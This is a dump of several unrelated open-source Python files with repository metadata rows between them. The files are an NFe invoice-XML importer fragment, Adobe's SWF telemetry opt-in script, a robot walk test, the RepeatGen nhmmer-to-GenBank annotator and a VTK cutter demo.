if options['arquivo']:
f = args[0]
try:
xmldoc = minidom.parse(f)
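                # Assumed minimal layout of the NFe XML read below:
                #   <chNFe> holds the 44-digit access key (chars 22:34 are
                #   used as the invoice number), <emit>/<CNPJ>/<xNome> give
                #   the issuer, and each <det> block is one invoice item.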
infNFE = xmldoc.getElementsByTagName('chNFe')[0]
idnfe = infNFE.firstChild.nodeValue[22:34]
nome_emissor = xmldoc.getElementsByTagName('xNome')[0]
nome = nome_emissor.firstChild.nodeValue
print "NOME DO EMISSOR: %s" % nome
print "ID NOTA FISCAL %s" % idnfe
emissor = xmldoc.getElementsByTagName('emit')[0]
cnpj_emissor = xmldoc.getElementsByTagName('CNPJ')[0].firstChild.nodeValue
                # look up the issuer
fornecedor,created = FabricanteFornecedor.objects.get_or_create(cnpj=cnpj_emissor)
fornecedor.nome = nome
fornecedor.save()
if created:
print "Fornecedor CRIADO: %s" % fornecedor
else:
print "Fornecedor encrontrado: %s" % fornecedor
total = xmldoc.getElementsByTagName('total')[0]
frete = total.getElementsByTagName('vFrete')[0].firstChild.nodeValue
                # create the NFe record in the system
nfe_sistema,created = NotaFiscal.objects.get_or_create(fabricante_fornecedor=fornecedor, numero=idnfe)
nfe_sistema.taxas_diversas = frete
nfe_sistema.save()
                # fetch the invoice items
itens = xmldoc.getElementsByTagName('det')
for item in itens:
                    # each invoice item...
codigo_produto = item.getElementsByTagName('cProd')[0].firstChild.nodeValue
quantidade = item.getElementsByTagName('qCom')[0].firstChild.nodeValue
valor_unitario = item.getElementsByTagName('vUnCom')[0].firstChild.nodeValue
print u"ITEM: %s" % codigo_produto
print u"Quantidade: %s" % quantidade
print u"Valor Unitário: %s" % valor_unitario
                    # taxes
try:
aliquota_icms = float(item.getElementsByTagName('pICMS')[0].firstChild.nodeValue)
except:
aliquota_icms = 0
try:
aliquota_ipi = float(item.getElementsByTagName('pIPI')[0].firstChild.nodeValue)
except:
aliquota_ipi = 0
try:
aliquota_pis = float(item.getElementsByTagName('pPIS')[0].firstChild.nodeValue)
except:
aliquota_pis = 0
try:
aliquota_cofins = float(item.getElementsByTagName('pCOFINS')[0].firstChild.nodeValue)
except:
aliquota_cofins = 0
                    total_impostos = aliquota_ipi + aliquota_icms + aliquota_cofins + aliquota_pis
                    # only IPI is actually applied; the full sum above is kept for reference
                    total_impostos = aliquota_ipi
print "Valor %% ICMS: %s" % aliquota_icms
print "Valor %% IPI: %s" % aliquota_ipi
print "Valor %% COFNS: %s" % aliquota_cofins
print "Valor %% PIS: %s" % aliquota_pis
print "Incidência de %% impostos: %s" % total_impostos
                    # look up the entry, to avoid two identical entries for the same part number
item_lancado,created = nfe_sistema.lancamentocomponente_set.get_or_create(part_number_fornecedor=codigo_produto)
                    # update
item_lancado.quantidade= quantidade
item_lancado.valor_unitario= valor_unitario
item_lancado.impostos= total_impostos
                    # save
item_lancado.save()
                    # automatic lookup in the part-number memory
item_lancado.busca_part_number_na_memoria()
                # compute the invoice totals
nfe_sistema.calcula_totais_nota()
                # print everything
print "#"*10
print "NOTA %s importada" % nfe_sistema.numero
frete = nfe_sistema.taxas_diversas
produtos = nfe_sistema.total_com_imposto
print "TOTAL DA NOTA: %s (Frete) + %s (Produtos + Impostos)" % (frete, produtos)
print "Produtos"
for lancamento in nfe_sistema.lancamentocomponente_set.all():
print u"----- PN-FORNECEDOR: %s, QTD: %s VALOR: %s, Impostos: %s%% = TOTAL: %s Unitário (considerando frete proporcional) %s" % (lancamento.part_number_fornecedor, lancamento.quantidade, lancamento.valor_unitario, lancamento.impostos, lancamento.valor_total_com_imposto, lancamento.valor_unitario_final)
except FabricanteFornecedor.DoesNotExist:
print u"Erro. Não encontrado Fornecedor com este CNPJ"
except:
raise
else:
print self.help
print self.args
|
lgpl-3.0
| 3,257,614,420,050,963,000
| 45.438462
| 323
| 0.549114
| false
| 3.770768
| false
| false
| false
|
shinho/SC2
|
bin/add-opt-in.py
|
1
|
7666
|
#!/usr/bin/env python
# Copyright (c) 2012, Adobe Systems Incorporated
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Adobe Systems Incorporated nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''See readme or run with no args for usage'''
import os
import sys
import tempfile
import shutil
import struct
import zlib
import hashlib
import inspect
supportsLZMA = False
try:
import pylzma
supportsLZMA = True
except:
pass
####################################
# Helpers
####################################
class stringFile(object):
def __init__(self, data):
self.data = data
def read(self, num=-1):
result = self.data[:num]
self.data = self.data[num:]
return result
def close(self):
self.data = None
def flush(self):
pass
def consumeSwfTag(f):
tagBytes = ""
recordHeaderRaw = f.read(2)
tagBytes += recordHeaderRaw
if recordHeaderRaw == "":
raise Exception("Bad SWF: Unexpected end of file")
recordHeader = struct.unpack("BB", recordHeaderRaw)
tagCode = ((recordHeader[1] & 0xff) << 8) | (recordHeader[0] & 0xff)
tagType = (tagCode >> 6)
tagLength = tagCode & 0x3f
if tagLength == 0x3f:
ll = f.read(4)
longlength = struct.unpack("BBBB", ll)
tagLength = ((longlength[3]&0xff) << 24) | ((longlength[2]&0xff) << 16) | ((longlength[1]&0xff) << 8) | (longlength[0]&0xff)
tagBytes += ll
tagBytes += f.read(tagLength)
return (tagType, tagBytes)
def outputInt(o, i):
o.write(struct.pack('I', i))
def outputTelemetryTag(o, passwordClear):
lengthBytes = 2 # reserve
if passwordClear:
sha = hashlib.sha256()
sha.update(passwordClear)
passwordDigest = sha.digest()
lengthBytes += len(passwordDigest)
# Record header
code = 93
if lengthBytes >= 63:
o.write(struct.pack('<HI', code << 6 | 0x3f, lengthBytes))
else:
o.write(struct.pack('<H', code << 6 | lengthBytes))
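    # e.g. with a password the body is 2 + 32 = 34 bytes, so the short form
    # packs (93 << 6) | 34 == 0x1762 into a little-endian uint16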
# Reserve
o.write(struct.pack('<H', 0))
# Password
if passwordClear:
o.write(passwordDigest)
####################################
# main()
####################################
if __name__ == "__main__":
####################################
# Parse command line
####################################
if len(sys.argv) < 2:
print("Usage: %s SWF_FILE [PASSWORD]" % os.path.basename(inspect.getfile(inspect.currentframe())))
print("\nIf PASSWORD is provided, then a password will be required to view advanced telemetry in Adobe 'Monocle'.")
sys.exit(-1)
infile = sys.argv[1]
passwordClear = sys.argv[2] if len(sys.argv) >= 3 else None
####################################
# Process SWF header
####################################
swfFH = open(infile, 'rb')
signature = swfFH.read(3)
swfVersion = swfFH.read(1)
struct.unpack("<I", swfFH.read(4))[0] # uncompressed length of file
if signature == "FWS":
pass
elif signature == "CWS":
decompressedFH = stringFile(zlib.decompressobj().decompress(swfFH.read()))
swfFH.close()
swfFH = decompressedFH
elif signature == "ZWS":
if not supportsLZMA:
raise Exception("You need the PyLZMA package to use this script on \
LZMA-compressed SWFs. http://www.joachim-bauch.de/projects/pylzma/")
swfFH.read(4) # compressed length
decompressedFH = stringFile(pylzma.decompress(swfFH.read()))
swfFH.close()
swfFH = decompressedFH
else:
raise Exception("Bad SWF: Unrecognized signature: %s" % signature)
f = swfFH
o = tempfile.TemporaryFile()
o.write(signature)
o.write(swfVersion)
outputInt(o, 0) # FileLength - we'll fix this up later
# FrameSize - this is nasty to read because its size can vary
rs = f.read(1)
r = struct.unpack("B", rs)
rbits = (r[0] & 0xff) >> 3
    rrbytes = (7 + (rbits*4) - 3) / 8
o.write(rs)
o.write(f.read((int)(rrbytes)))
o.write(f.read(4)) # FrameRate and FrameCount
####################################
# Process each SWF tag
####################################
while True:
(tagType, tagBytes) = consumeSwfTag(f)
if tagType == 93:
raise Exception("Bad SWF: already has EnableTelemetry tag")
elif tagType == 92:
raise Exception("Bad SWF: Signed SWFs are not supported")
elif tagType == 69:
# FileAttributes tag
o.write(tagBytes)
# Look ahead for Metadata tag. If present, put our tag after it
(nextTagType, nextTagBytes) = consumeSwfTag(f)
writeAfterNextTag = nextTagType == 77
if writeAfterNextTag:
o.write(nextTagBytes)
outputTelemetryTag(o, passwordClear)
# If there was no Metadata tag, we still need to write that tag out
if not writeAfterNextTag:
o.write(nextTagBytes)
(tagType, tagBytes) = consumeSwfTag(f)
o.write(tagBytes)
if tagType == 0:
break
####################################
# Finish up
####################################
# Fix the FileLength header
uncompressedLength = o.tell()
o.seek(4)
o.write(struct.pack("I", uncompressedLength))
o.flush()
o.seek(0)
# Copy the temp file to the outFile, compressing if necessary
outFile = open(infile, "wb")
if signature == "FWS":
shutil.copyfileobj(o, outFile)
else:
outFile.write(o.read(8)) # File is compressed after header
if signature == "CWS":
outFile.write(zlib.compress(o.read()))
elif signature == "ZWS":
compressed = pylzma.compress(o.read())
outputInt(outFile, len(compressed)-5) # LZMA SWF has CompressedLength header field
outFile.write(compressed)
else:
            assert False
outFile.close()
if passwordClear:
print("Added opt-in flag with encrypted password " + passwordClear)
else:
print("Added opt-in flag with no password")
|
gpl-3.0
| 1,561,226,999,871,632,100
| 30.941667
| 132
| 0.594834
| false
| 3.949511
| false
| false
| false
|
aguirrea/lucy
|
tests/testBalieroWalk.py
|
1
|
2371
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Andrés Aguirre Dorelo
# MINA/INCO/UDELAR
#
# Execution of individuals resulted from the Baliero and Pias work
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import glob
import os
import sys
import time
from configuration.LoadSystemConfiguration import LoadSystemConfiguration
from datatypes.DTIndividualGeneticMaterial import DTIndividualGeneticTimeSerieFile, DTIndividualGeneticMatrix
from datatypes.DTIndividualProperty import DTIndividualPropertyBaliero, DTIndividualPropertyPhysicalBioloid
from Individual import Individual
balieroProp = DTIndividualPropertyBaliero()
physicalProp = DTIndividualPropertyPhysicalBioloid()
conf = LoadSystemConfiguration()
BalieroDir = os.getcwd()+conf.getDirectory("Baliero transformed walk Files")
arguments = len(sys.argv)
def createIndividual(filename):
if int(conf.getProperty("Lucy simulated?"))==1:
walk = Individual(balieroProp, DTIndividualGeneticTimeSerieFile(os.getcwd()+"/"+filename))
else:
walk = Individual(physicalProp, DTIndividualGeneticTimeSerieFile(os.getcwd()+"/"+filename))
return walk
walk = Individual(balieroProp, DTIndividualGeneticMatrix()) #dummy individual to initialise the simulator and enable the time step configuration
walk.execute()
print "please set the proper time step in vrep"
time.sleep(5)
if arguments > 1:
files = sys.argv[1:]
for filename in files:
print 'executing individual: ' + filename
walk = createIndividual(filename)
walk.execute()
else:
for filename in glob.glob(os.path.join(BalieroDir, '*.xml')):
print 'executing individual: ' + filename
walk = createIndividual(filename)
walk.execute()
|
gpl-3.0
| 1,704,087,821,725,901,800
| 36.03125
| 144
| 0.745992
| false
| 3.910891
| false
| false
| false
|
nikolaichik/SigmoID
|
Python/RepeatGen.py
|
1
|
23652
|
import sys
import argparse
from time import process_time
import Bio
from Bio.SeqFeature import FeatureLocation
from Bio.SeqFeature import SeqFeature
from decimal import *
class MySeqFeature(SeqFeature):
def __str__(self):
out = "type: %s\n" % self.type
if self.strand == 1:
out += "location: [%s:%s](%s)\n" % (self.location.start+1,
self.location.end, '+')
if self.strand == -1:
out += "location: [%s:%s](%s)\n" % (self.location.start+1,
self.location.end, '-')
if self.id and self.id != "<unknown id>":
out += "id: %s\n" % self.id
out += "qualifiers:\n"
for qual_key in sorted(self.qualifiers):
out += " Key: %s, Value: %s\n" % (qual_key,
self.qualifiers[qual_key])
if Bio.__version__ != '1.68': # to avoid problems with diff biopython versions
if not hasattr(self, "_sub_features"):
self._sub_features = []
if len(self._sub_features) != 0:
out += "Sub-Features\n"
for sub_feature in self._sub_features:
out += "%s\n" % sub_feature
return out
def is_within_feature(list_of_features, index, some_hit):
# 'index' is for feature's index within 'list_of_features'
if (list_of_features[index].location.start <
some_hit.location.start <
list_of_features[index].location.end or
list_of_features[index].location.start <
some_hit.location.end <
list_of_features[index].location.end) or \
(list_of_features[index].location.start <
some_hit.location.start <
some_hit.location.end <
list_of_features[index+1].location.start and \
list_of_features[index].strand == +1 and \
list_of_features[index].strand !=
list_of_features[index+1].strand):
# checking if hit is within other features or is between two convergent ones.
return True
else:
return False
def is_within_boundary(list_of_features, index, some_hit):
for feature in list_of_features[index:]:
if (feature.location.start - list_of_features[index].location.end) < (enter.boundary+1):
if (list_of_features[index].location.start+enter.boundary > \
some_hit.location.end > \
list_of_features[index].location.start and \
list_of_features[index].strand == +1) or \
(list_of_features[index].location.end-enter.boundary < \
some_hit.location.start < \
list_of_features[index].location.end and \
list_of_features[index].strand == -1):
return True
else:
return False
else:
return False
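def wrong_promoter_strand(prev_feature, some_hit, next_feature):
    # Hedged reconstruction: the script calls this helper in the --insert
    # filter below but never defines it. This sketch assumes the intent is to
    # drop a hit sitting between two features when its strand points away
    # from the neighbour it could act on: a plus-strand hit should face a
    # plus-strand downstream feature, a minus-strand hit a minus-strand
    # upstream one.
    if some_hit.strand == 1:
        return next_feature.strand != 1
    if some_hit.strand == -1:
        return prev_feature.strand != -1
    return False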
def qualifiers_function(qualifiers, var):
qual_var = []
for some_qualifier in qualifiers:
if any(symbol == '#' for symbol in some_qualifier):
qual_var.append(some_qualifier.split('#'))
else:
sys.exit('Please check your general qualifiers typing')
for number in range(len(qual_var)):
value_list = []
for index in range(len(qual_var)):
if qual_var[number][0] == qual_var[index][0] and \
qual_var[index][1] not in value_list:
value_list.append(qual_var[index][1])
var[qual_var[number][0]] = value_list
return var
def nhmm_parser(path_to_file, max_model_length):
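    # Parses nhmmer --tblout rows. Fields used per row (0-indexed, assuming
    # the standard tblout column order): 8/9 envelope coords, 11 strand
    # ('+'/'-', turned into +1/-1 by appending '1'), 12 E-value, 13 score,
    # 0/1 target name and accession, 4-7 hmm and alignment coords.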
x = []
try:
a = open(path_to_file, 'r')
except IOError:
sys.exit('Open error! Please check your nhmmer report input file!')
r = a.readlines()
b = []
d = []
e = []
for index in range(len(r)):
d.append([])
if not r[index].startswith('#') or r[index].startswith('\n'):
item = r[index].split(' ')
if len(item) >= 2:
for part in item:
if part != '' and len(part) != 0:
part = part.replace('\n', '')
d[index].append(part)
for index in range(len(d)):
if len(d[index]) != 0:
b.append(d[index])
for index in range(len(b)):
if len(b[index]) <= 10:
for number in range(len(b[index])):
b[index+1].insert(number, b[index][number])
for index in range(len(b)):
if len(b[index]) > 10:
e.append(b[index])
for item in e:
for num_of_spaces in range(len(e[0])):
# to avoid problems with additional spaces... e[0] - firstly \
# splitted string by ' '
try:
x.append([item[8+num_of_spaces],
item[9+num_of_spaces],
int(item[11+num_of_spaces]+'1'),
float(item[12+num_of_spaces]),
float(item[13+num_of_spaces]),
item[0+num_of_spaces],
item[1+num_of_spaces],
int(item[4+num_of_spaces]),
int(item[5+num_of_spaces]),
int(item[6+num_of_spaces]),
int(item[7+num_of_spaces])
])
if max_model_length is False:
max_model_length = int(item[5+num_of_spaces])
elif max_model_length is not False and \
int(item[5+num_of_spaces]) > max_model_length:
max_model_length = int(item[5+num_of_spaces])
else:
pass
except ValueError:
pass
else:
break
return [x, max_model_length]
def nhmm_prog(path_to_file, e):
a = open(path_to_file, 'r')
r = a.readlines()
prog_list = []
for prog_line in r:
if prog_line.startswith('# Program:') or \
prog_line.startswith('# Version:'):
prog_list.append(prog_line)
prog_list = [item.split(' ') for item in prog_list]
for item in prog_list:
for piece in item:
if piece != '':
e.append(piece)
return
def sorting_output_features(lst):
bit_score_list = []
for some_feature in lst:
for key in some_feature.qualifiers.keys():
if key == 'note':
temp = some_feature.qualifiers[key]
temp = temp.split(' ')
bit_score_list.append(float(temp[-3]))
return bit_score_list
def score_parser(some_feature):
for key in some_feature.qualifiers.keys():
if key == 'note' and type(some_feature.qualifiers['note']) != list:
temp = some_feature.qualifiers[key]
temp = temp.split(' ')
bit_score = float(temp[-3])
return bit_score
elif key == 'note' and type(some_feature.qualifiers['note']) == list:
for note in some_feature.qualifiers['note']:
if note.startswith('nhmmer'):
temp = note
temp = temp.split(' ')
bit_score = float(temp[-3])
return bit_score
def output(score_list, output_features):
for val in score_list:
for some_feature in output_features:
if val == feature_score(some_feature):
print (some_feature)
output_features = [f for f in output_features if f != some_feature]
def feature_score(some_feature):
for key in some_feature.qualifiers.keys():
if key == 'note' and type(some_feature.qualifiers[key]) != []:
temp = some_feature.qualifiers[key]
temp = temp.split(' ')
return float(temp[-3])
def dna_topology(path, topo_list):
    # This function deals with the DNA topology problem in Biopython;
# for more detail: https://github.com/biopython/biopython/issues/363
infile = open(path, 'r')
loci_counter = -1 # because 1 is 0 in python
lines = infile.readlines()
for numline in range(len(lines)):
if lines[numline].startswith('LOCUS'):
loci_counter += 1
lines[numline] = topo_list[loci_counter]
infile.close()
return lines
def createparser():
parser = argparse.ArgumentParser(
prog='RepeatGen',
usage='\n%(prog)s <report_file> <input_file> <output_file> [options]',
description='''This script allows to add features to a genbank \
file according to nhmmer results.\
Requires Biopython 1.64 (or newer)''',
epilog='(c) Aliaksandr Damienikan, 2018.')
parser.add_argument('report_file',
help='path to nhmmer report file produced with \
-tblout option.')
parser.add_argument('input_file',
help='path to input Genbank file.')
parser.add_argument('output_file', help='path to output Genbank file.')
parser.add_argument('-L', '--length',
default=False,
help='annotate features of specified length (range of lengths).',
metavar='<int>/<int:int>',
required=False,
type=str)
parser.add_argument('-q', '--qual',
default='',
metavar='<key#"value">',
nargs='*',
dest='qual',
help='''add this qualifier to each annotated \
feature.''')
parser.add_argument('-p', '--palindromic',
action='store_const',
const=True,
default=False,
help='''filter palindromic repeats.''')
parser.add_argument('-E', '--eval',
default=False,
type=float,
metavar='<float or integer>',
help='''threshold E-Value.''')
parser.add_argument('-S', '--score',
default=False,
type=float,
metavar='<float or integer>',
help='''threshold Bit Score.''')
parser.add_argument('-c', '--coverage',
default=0.5,
type=float,
metavar='<float>',
help='''minimal coverage for input model (default is 0.5)''')
parser.add_argument('-i', '--insert',
action='store_const',
const=True,
default=False,
help='''don't add features inside CDS.''')
parser.add_argument('-a', '--alilen',
type=int,
default=False,
metavar='<integer>',
help='''set profile alignment length (the largest hmm_to if not specified).''')
parser.add_argument('-b', '--boundary',
type=int,
default=0,
metavar='<integer>',
help='''set allowed length boundary for hits being within features.''')
parser.add_argument('-d', '--duplicate',
action='store_const',
const=True,
default=False,
help='''no duplicate features with the same location \
and the same rpt_family qualifier
value.''')
parser.add_argument('-v', '--version',
action='version',
version='%(prog)s 1.3 (April 6, 2021)')
parser.add_argument('-f', '--feature',
metavar='<"feature key">',
default='unknown type',
help='''feature key to add (promoter, protein_bind \
etc.)''')
return parser
t_start = process_time()
args = createparser()
enter = args.parse_args()
arguments = sys.argv[1:0]
max_eval = enter.eval
if enter.length is not False:
enter.length = enter.length.split(':')
if len(enter.length) == 1:
enter.min_length = False
enter.max_length = int(enter.length[0])
else:
enter.min_length = int(enter.length[0])
enter.max_length = int(enter.length[1])
if not 0 <= enter.coverage <= 1:
sys.exit('Coverage value is invalid, please specify values in 0.0-1.0 range')
try:
from Bio import SeqIO
except ImportError:
sys.exit('\nYou have no Biopython module installed!\n\
You can download it here for free: \
http://biopython.org/wiki/Download\n')
try:
input_handle = open(enter.input_file, 'r')
except IOError:
sys.exit('Open error! Please check your genbank input file!')
circular_vs_linear = []
for line in input_handle.readlines():
if line.startswith('LOCUS'):
circular_vs_linear.append(line)
input_handle.close()
input_handle = open(enter.input_file, 'r')
if enter.input_file == enter.output_file:
    sys.exit('Sorry, but we can\'t edit input file. Please give another name \
to output file!')
try:
output_handle = open(enter.output_file, 'w')
except IOError:
sys.exit('Open error! Please check your genbank output path!')
print ('\nRepeatGen 1.3 (April 6, 2021)')
print ("="*50)
print ('Options used:\n')
for arg in range(1, len(sys.argv)):
print (sys.argv[arg])
file_path = enter.report_file
qualifier = {'CHECK': 'CHECKED!'}
qualifiers_function(enter.qual, qualifier)
prog = []
maxlen = 0
parser_result = nhmm_parser(file_path, maxlen)
allign_list = parser_result[0]
if enter.alilen is False:
model_length = parser_result[1] # if allignment length is not specified, maximal observed hmm_to is used
else:
model_length = enter.alilen
nhmm_prog(file_path, prog)
prog[2] = prog[2].replace('\r', '')
records = SeqIO.parse(input_handle, 'genbank')
allowed_types = ['CDS', 'ncRNA', 'sRNA', 'tRNA', 'misc_RNA']
total = 0
for record in records:
print ('\n' + "-"*50 + "\nCONTIG: " + record.id)
print ('\n FEATURES ADDED: \n')
allowed_features_list = []
for feature in record.features:
if feature.type in allowed_types:
allowed_features_list.append(feature)
try:
cds_loc_start = allowed_features_list[0]
except:
cds_loc_start = record.features[0]
try:
cds_loc_end = allowed_features_list[-1]
except:
cds_loc_end = record.features[-1]
for allign in allign_list:
from Bio import SeqFeature
if allign[2] == +1:
env_start = int(allign[0]) #env_from
env_end = int(allign[1]) #env_to
strnd = int(allign[2])
e_value = float(allign[3])
score = allign[4]
locus = allign[5]
version = allign[6]
hmm_from = allign[7]
hmm_to = allign[8]
hmm_diff = hmm_to - hmm_from
getcontext().prec = 4
hmm_coverage = Decimal((hmm_diff+1))/Decimal(model_length)
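            # e.g. a hit covering hmm positions 5..104 of a 200-column model
            # gives (104 - 5 + 1) / 200 = 0.5 coverage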
ali_start = allign[9]
ali_end = allign[10]
ali_diff = ali_end - ali_start
else:
env_start = int(allign[1]) #env_to
env_end = int(allign[0]) #env_from
strnd = int(allign[2])
e_value = float(allign[3])
score = allign[4]
locus = allign[5]
version = allign[6]
hmm_from = allign[7]
hmm_to = allign[8]
hmm_diff = hmm_to - hmm_from
getcontext().prec = 4
hmm_coverage = Decimal((hmm_diff+1))/Decimal(model_length)
ali_start = allign[10]
ali_end = allign[9]
ali_diff = ali_end - ali_start
start_pos = SeqFeature.ExactPosition(env_start-1)
end_pos = SeqFeature.ExactPosition(env_end)
feature_length = env_end - (env_start-1)
feature_location = FeatureLocation(start_pos, end_pos)
feature_type = enter.feature
from Bio.SeqFeature import SeqFeature
note_qualifier = dict()
note_qualifier['note'] = str('%s score %s E-value %s' %
(prog[2].replace('\n', ''),
score,
e_value))
my_feature = MySeqFeature(
location=feature_location,
type=feature_type,
strand=strnd,
qualifiers=dict(list(qualifier.items()) +
list(note_qualifier.items())))
        if Decimal(hmm_coverage) >= Decimal(enter.coverage) and \
           (enter.length is False or
            (enter.min_length is not False and enter.min_length <= feature_length <= enter.max_length) or
            (enter.min_length is False and feature_length == enter.max_length)
           ) and \
           (score >= enter.score or enter.score is False):
for i in reversed(range(len(record.features))):
if record.features[i].location.start < \
my_feature.location.start and \
(enter.eval is False or e_value <= enter.eval or
enter.score is not False):
for c in range(len(allowed_features_list)-1):
if allowed_features_list[c].location.start <= \
my_feature.location.start <= \
allowed_features_list[c+1].location.start:
record.features.insert(i+1, my_feature)
break
break
if i == 0 and \
record.features[i].location.start > \
my_feature.location.start:
record.features.insert(i, my_feature)
break
if i == len(record.features)-1 and \
record.features[i].location.start < \
my_feature.location.start:
record.features.insert(i+1, my_feature)
break
repeats = []
for feature in record.features:
if 'rpt_family' in feature.qualifiers.keys():
if (feature.qualifiers['rpt_family'] == qualifier['rpt_family'] and \
enter.duplicate is True) or enter.duplicate is False:
repeats.append([feature, record.features.index(feature)])
if enter.insert:
hit_list = []
for i in range(len(record.features)):
if 'CHECK' in record.features[i].qualifiers.keys():
hit_list.append(record.features[i])
for i in reversed(range(len(hit_list))):
i = len(hit_list)-1-i
for n in range(len(allowed_features_list)-1):
if (
is_within_feature(allowed_features_list,
n,
hit_list[i]) and \
not is_within_boundary(allowed_features_list,
n,
hit_list[i])
) or \
wrong_promoter_strand(allowed_features_list[n],
hit_list[i],
allowed_features_list[n+1]):
hit_list.pop(i)
break
for i in reversed(range(len(record.features))):
if 'CHECK' in record.features[i].qualifiers.keys() and \
not any(record.features[i] == hit for hit in hit_list):
record.features.pop(i)
if enter.palindromic:
del_counter = 0
deleted = []
for feature in repeats:
if feature not in deleted:
for n in range(repeats.index(feature)+1, len(repeats)):
further = repeats[n][0]
if further.location.strand != feature[0].location.strand and \
0 <= (further.location.start-feature[0].location.start) <= 2 and \
0 <= (further.location.end-feature[0].location.end) <= 2 and \
'CHECK' in record.features[feature[1]-del_counter].qualifiers.keys():
del record.features[feature[1]-del_counter]
del_counter += 1
deleted.append(feature)
elif enter.duplicate is True:
if further.location.strand != feature[0].location.strand and \
0 <= (further.location.start-feature[0].location.start) <= 2 and \
0 <= (further.location.end-feature[0].location.end) <= 2 and \
'CHECK' not in record.features[feature[1]-del_counter].qualifiers.keys() and \
'CHECK' in record.features[repeats[n][1]-del_counter].qualifiers.keys():
del record.features[repeats[n][1]-del_counter]
del_counter += 1
deleted.append(further)
if enter.duplicate is True and \
'rpt_family' in qualifier.keys():
repeats = []
del_counter = 0
for feature in record.features:
if 'rpt_family' in feature.qualifiers.keys():
if feature.qualifiers['rpt_family'] == qualifier['rpt_family']:
repeats.append([feature, record.features.index(feature)])
for repeat in repeats:
for n in range(repeats.index(repeat)+1, len(repeats)):
further_repeat = repeats[n][0]
if 0 <= (further_repeat.location.start - repeat[0].location.start) <= 2 and \
0 <= (further_repeat.location.end - repeat[0].location.end) <= 2 and \
repeat[0].qualifiers['rpt_family'] == further_repeat.qualifiers['rpt_family']:
if score_parser(repeat[0]) >= \
score_parser(further_repeat):
del record.features[repeat[1]-del_counter]
elif score_parser(repeat[0]) < \
score_parser(further_repeat):
del record.features[repeats[n][0]-del_counter]
del_counter += 1
break
output_features = []
for feature in record.features:
if 'CHECK' in feature.qualifiers.keys():
del feature.qualifiers['CHECK']
output_features.append(feature)
score_list = sorting_output_features(output_features)
score_list.sort()
output(score_list, output_features)
print ('\nFeatures added:', len(output_features))
print ('\n' + "-"*50)
SeqIO.write(record, output_handle, 'genbank')
total += int(len(output_features))
output_handle.close()
newlines = dna_topology(enter.output_file, circular_vs_linear)
new_output_file = open(enter.output_file, 'w')
new_output_file.writelines(newlines)
new_output_file.close()
input_handle.close()
t_end = process_time()
print ('Total features: ', total)
print ('CPU time: {0:.3f} sec'.format(t_end-t_start))
print ('\n' + "="*50)
|
gpl-3.0
| -6,934,267,850,099,133,000
| 41.085409
| 109
| 0.50723
| false
| 4.087798
| false
| false
| false
|
lorensen/VTKExamples
|
src/Python/VisualizationAlgorithms/Cutter.py
|
1
|
1710
|
#!/usr/bin/env python
# A simple script to demonstrate the vtkCutter function
import vtk
def main():
colors = vtk.vtkNamedColors()
# Create a cube
cube = vtk.vtkCubeSource()
cube.SetXLength(40)
cube.SetYLength(30)
cube.SetZLength(20)
cubeMapper = vtk.vtkPolyDataMapper()
cubeMapper.SetInputConnection(cube.GetOutputPort())
    # create a plane to cut; a normal of (1,0,0) gives a YZ cut plane
    # (XY plane: normal (0,0,1); XZ plane: normal (0,1,0))
plane = vtk.vtkPlane()
plane.SetOrigin(10, 0, 0)
plane.SetNormal(1, 0, 0)
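    # vtkCubeSource is centred at the origin by default, so the cube spans
    # x in [-20, 20] and the plane at x=10 makes an off-centre cut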
# create cutter
cutter = vtk.vtkCutter()
cutter.SetCutFunction(plane)
cutter.SetInputConnection(cube.GetOutputPort())
cutter.Update()
cutterMapper = vtk.vtkPolyDataMapper()
cutterMapper.SetInputConnection(cutter.GetOutputPort())
# create plane actor
planeActor = vtk.vtkActor()
planeActor.GetProperty().SetColor(colors.GetColor3d("Yellow"))
planeActor.GetProperty().SetLineWidth(2)
planeActor.SetMapper(cutterMapper)
# create cube actor
cubeActor = vtk.vtkActor()
cubeActor.GetProperty().SetColor(colors.GetColor3d("Aquamarine"))
cubeActor.GetProperty().SetOpacity(0.3)
cubeActor.SetMapper(cubeMapper)
# create renderers and add actors of plane and cube
ren = vtk.vtkRenderer()
ren.AddActor(planeActor)
ren.AddActor(cubeActor)
# Add renderer to renderwindow and render
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(600, 600)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
ren.SetBackground(colors.GetColor3d("Silver"))
renWin.Render()
iren.Start()
if __name__ == '__main__':
main()
|
apache-2.0
| 636,900,238,253,238,100
| 26.580645
| 103
| 0.693567
| false
| 3.392857
| false
| false
| false
|
ngsxfem/ngsxfem
|
